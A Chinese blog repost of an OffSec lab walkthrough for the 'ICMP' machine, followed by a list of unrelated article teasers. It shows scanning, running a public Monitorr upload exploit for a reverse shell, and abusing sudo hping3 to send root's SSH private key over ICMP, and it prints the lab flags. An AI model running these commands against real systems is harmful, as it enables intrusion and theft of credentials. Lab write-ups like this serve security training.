[Offsec Lab] ICMP Monitorr-RCE+hping3权限提升

[Offsec Lab] ICMP Monitorr-RCE+hping3权限提升

article2024/10/9 23:41:45/文章来源:https://blog.csdn.net/qq_51886509/article/details/142687418

信息收集

IP Address	Opening Ports
192.168.52.218	TCP:22,80

$ nmap -p- 192.168.52.218 --min-rate 1000 -sC -sV -Pn

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 de:b5:23:89:bb:9f:d4:1a:b5:04:53:d0:b7:5c:b0:3f (RSA)
|   256 16:09:14:ea:b9:fa:17:e9:45:39:5e:3b:b4:fd:11:0a (ECDSA)
|_  256 9f:66:5e:71:b9:12:5d:ed:70:5a:4f:5a:8d:0d:65:d5 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
| http-title:             Monitorr            | Monitorr        
|_Requested resource was http://192.168.52.218/mon/
|_http-server-header: Apache/2.4.38 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Monitorr-RCE

$ searchsploit Monitorr -w

http://192.168.52.218/mon/assets/php/upload.php

$ python3 /usr/share/exploitdb/exploits/php/webapps/48980.py http://192.168.52.218/mon 192.168.49.52 10077

fox目录下存在Local.txt

Local.txt

4d2ed33d3467974721246fd088ec495c

www-data -> fox

www-data@icmp:/home/fox$ cat reminder

www-data@icmp:/home/fox$ cat ./devel/crypt.php

BUHNIJMONIBUVCYTTYVGBUHJNI

权限提升-hping3

$ sudo -l

https://gtfobins.github.io/gtfobins/hping3/

如果你尝试在kali上运行可能会触发内存锁定警告,所以保险的方法就是监听和执行应均在靶机上执行…

$ sudo hping3 --icmp 127.0.0.1 --listen signature --safe

$ sudo hping3 --icmp 127.0.0.1 --sign signature --file /root/.ssh/id_rsa -d 4000 -c 2

$ chmod 600 id_rsa

$ ssh -i ./id_rsa root@192.168.58.218

proof.txt

407e47c8f6e703f101254a04448f1014

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.mfbz.cn/a/888801.html

如若内容造成侵权/违法违规/事实不符，请联系我们进行投诉反馈qq邮箱809451989@qq.com，一经查实，立即删除！

相关文章

数据校验的总结

数据校验的总结

业务层进行复杂检查简单校验交给Controller校验，能流到业务的层的数据就是基本合法引入依赖：spring-boot-starter-validation 能标注的所有注解在这两个地方看 jakarta.validation.constraints、 org.hibernate.validator.constraints 使用步骤…

阅读更多...

Web APIs——Dom获取属性操作

Web APIs——Dom获取属性操作

1.变量声明 1.1以后声明变量我们优先使用哪个？ const 有了变量先给const，如果发现它后面是要被修改的，再改为let 1.2 为什么const声明的对象可以修改里面的属性？ 因为对象是引用类型，里面存储的是地址&#x…

阅读更多...

2024 ciscn WP

2024 ciscn WP

一、MISC 1.火锅链观光打卡打开后连接自己的钱包，然后点击开始游戏，答题八次后点击获取NFT，得到有flag的图片没什么多说的，知识问答题兑换 NFT Flag{y0u_ar3_hotpot_K1ng} 2.Power Trajectory Diagram 方法1： 使用p…

阅读更多...

《Programming from the Ground Up》阅读笔记：p147-p180

《Programming from the Ground Up》阅读笔记：p147-p180

《Programming from the Ground Up》学习第9天，p147-p180总结，总计34页。一、技术总结 1.Physical memeory p152, Physical memory refers to the actual RAM chips inside your computer and what they contain. 物理地址指的RAM，即我们…

阅读更多...

库函数相关（上一篇补充）

库函数相关（上一篇补充）

一、创建自己的头文件在当前目录下创建一个my_head.h将这个文件移动到/usr/include目录 #ifndef __MY_HEAD_H__ #define __MY_HEAD_H__#include <stdio.h> #include <errno.h> #include <string.h>#define PRINT_ERR(s) do{\printf("%s %s %d\n&quo…

阅读更多...

minio简单使用

minio简单使用

文章目录简介官方地址Linux下载安装安装服务启动关闭帮助命令 java开发minio依赖包新建项目pom配置文件配置类Service测试类运行测试 Api使用前言针对桶的操作查看某个桶是否存在创建一个桶返回桶列表删除一个桶针对文件的操作上传文件到桶中(本地文件上传)上传文件到桶中(基…

阅读更多...

猴子吃桃-C语言

猴子吃桃-C语言

1.问题： 猴子第一天摘下若干个桃子，当即吃了一半，还不过瘾，又多吃了一个。第二天早上又将剩下的桃子吃掉一半，又多吃一个。以后每天早上都吃了前一天剩下的一半零一个。到第N天早上想再吃时，见只剩下一个…

阅读更多...

【学习笔记】一种使用多项式快速计算 sin 和 cos 近似值的方法

【学习笔记】一种使用多项式快速计算 sin 和 cos 近似值的方法

一种使用多项式快速计算 sin 和 cos 近似值的方法在嵌入式开发、游戏开发或其他需要快速数学计算的领域，sin 和 cos 函数的计算时间可能会影响程序的整体性能。特别是在对时间敏感、精度要求不高的场景中，传统的 sin 和 cos 函数由于依赖复杂的数值方法…

阅读更多...

【UE】简单介绍“Extra Win Function”插件的功能

【UE】简单介绍“Extra Win Function”插件的功能

“Extra Win Function”插件包含32个C类封住成的蓝图节点供用户使用，下面简单介绍19个可能常用的节点的功能。 1. “Is Internet Available” 检查是否可接入互联网 2. “Get Device Platform” 获取设备平台名称 3. “Get Android Device RAMSize” 获取RAM 大小 …

阅读更多...

【Java SE基础回顾】看这篇就够了！

【Java SE基础回顾】看这篇就够了！

JavaSE复习参考视频：【狂神说Java】JavaSE阶段回顾总结简单的就不讲了，比如什么break和continue区别，甚至一些什么什么继承封装多态的概念等等。主要写一些Java特有的，重点的基础知识。主要还是例子和代码更多，更有…

阅读更多...

Android Preference的使用以及解析

Android Preference的使用以及解析

简单使用 values.arrays.xml <?xml version"1.0" encoding"utf-8"?> <resources><string-array name"list_entries"><item>Option 1</item><item>Option 2</item><item>Option 3</item&…

阅读更多...

衡石分析平台系统管理手册-智能运维之系统设置

衡石分析平台系统管理手册-智能运维之系统设置

系统设置 HENGSHI 系统设置中展示了系统运行时的一些参数，包括主程序相关信息，Base URL、HTTP 代理、图表数据缓存周期、数据集缓存大小、租户引擎等相关信息。主程序系统设置中展示了主程序相关信息，这些信息是系统自动生成的&#…

阅读更多...

Linux 之 Linux应用编程概念、文件IO、标准IO

Linux 之 Linux应用编程概念、文件IO、标准IO

Linux应用编程概念、文件IO、标准IO 学习任务： 1、学习Linux 应用开发概念，什么是系统调用，什么是库函数 2、学习文件IO：包括 read、write、open、close、lseek 3、深入文件IO：错误处理、exit 等 4、学习标准IO&a…

阅读更多...

TCP四次挥手过程详解

TCP四次挥手过程详解

TCP四次挥手全过程有几点需要澄清： 1.首先，tcp四次挥手只有主动和被动方之分，没有客户端和服务端的概念 2.其次，发送报文段是tcp协议栈的行为，用户态调用close会陷入到内核态 3.再者，图中的情况前提是双…

阅读更多...

什么是PLM系统？PLM系统对制造业起到哪些作用？三品PLM系统对汽车制造业意义

什么是PLM系统？PLM系统对制造业起到哪些作用？三品PLM系统对汽车制造业意义

在当今竞争激烈的制造业环境中，企业面临着来自市场、技术、客户需求等多方面的挑战。为了应对这些挑战，许多制造企业纷纷引入产品生命周期管理PLM系统，以实现更高效、更灵活的产品全生命周期管理。PLM系统以其独特的优势，在优化产…

阅读更多...

【RAG论文精读3】RAG论文综述1（2312.10997）-第1部分

【RAG论文精读3】RAG论文综述1（2312.10997）-第1部分

更多AI知识点总结见我的专栏：【AI知识点】 AI论文精读、项目和一些个人思考见我另一专栏：【AI修炼之路】有什么问题、批评和建议都非常欢迎交流，三人行必有我师焉😁 简介论文中英文名 Retrieval-Augmented Generation for Lar…

阅读更多...

解压缩软件哪个好？不同场景下的最佳选择

解压缩软件哪个好？不同场景下的最佳选择

解压缩软件在日常工作与生活中发挥着至关重要的作用，从简单的文件解压到处理大型项目，选择一款适合自己的解压缩软件能够大幅提高工作效率。面对众多解压缩工具，如WinRAR、7-Zip、解压专家、PeaZip等，如何根据不同的使用场景选择…

阅读更多...

xss-labs靶场第一关测试报告

xss-labs靶场第一关测试报告

目录一、测试环境 1、系统环境 2、使用工具/软件二、测试目的三、操作过程 1、注入点寻找 2、使用hackbar进行payload测试 3、绕过结果四、源代码分析五、结论一、测试环境 1、系统环境渗透机：本机(127.0.0.1) 靶机：本机(127.0.0.…

阅读更多...

咸鱼sign逆向分析与爬虫实现

咸鱼sign逆向分析与爬虫实现

目标：🐟的搜索商品接口这个站异步有点多，好在代码没什么混淆。加密的sign值我们可以通过搜索找到位置 sign值通过k赋值，k则是字符串拼接后传入i函数加密除了开头的aff…，后面的都是明文没什么好说的，我…

阅读更多...

Apache DolphinScheduler社区9月进展记录

Apache DolphinScheduler社区9月进展记录

各位热爱 Apache DolphinScheduler 的小伙伴们，社区 9 月月报更新啦！这里将记录 Apache DolphinScheduler 社区每月的重要更新，欢迎关注！ 月度 Merge Star 感谢以下小伙伴上个月为 Apache DolphinScheduler 做的精彩贡献&#x…

阅读更多...

最新文章